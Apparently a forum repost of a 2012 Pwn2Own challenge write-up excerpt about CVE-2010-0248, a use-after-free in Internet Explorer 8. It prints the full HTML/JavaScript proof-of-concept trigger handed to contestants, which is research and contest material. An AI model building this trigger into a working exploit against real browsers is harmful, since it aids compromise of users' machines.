Pwn2Own Challenges: Heapsprays are for the 99%

Nytro · March 23, 2012

Pwn2Own Challenges: Heapsprays are for the 99%

BY

THU 15 MAR 2012

In case you arent familiar with the Pwn2Own rules this year, we asked people to exploit public bugs... here's one of them. The cve in question (cve-2010-0248) is a use-after-free vulnerability in Internet Explorer 8 found by yours truly back in 2010. This specific bug is triggered by the following poc:

<html>   <head>
     <script>


       function Start() {




         var TableClone = document.getElementById('tableid').cloneNode(1);
         var TableCellUrns = TableClone.cells.urns('a');
         //var bla = TableClone.cells.item(1);
         var TableCellUrnsTags = TableCellUrns.tags('a');
         TableClone.outerText = 'a';


         Result = TableClone.cells;


         Result = TableCellUrnsTags.item(-1);
       }


     </script>
   </head>
   <body onLoad="window.setTimeout(Start,100);" id="bodyid">


     <table id="tableid">
       <tr><th id="thid"></th></tr>
       <tr id="trid"><td id="tdid"></td></tr>
     </table>


   </body>

</html>

Download here

This is also the trigger that we handed out to the contestants at Pwn2Own for the CVE challenges. So if you want to try it out yourself you should probably stop reading right now and just start playing around with it.

Articol complet:

http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup

Edited March 23, 2012 by Nytro

Sign In

Pwn2Own Challenges: Heapsprays are for the 99%

Recommended Posts

Nytro

Join the conversation

Browse

Activity

Pages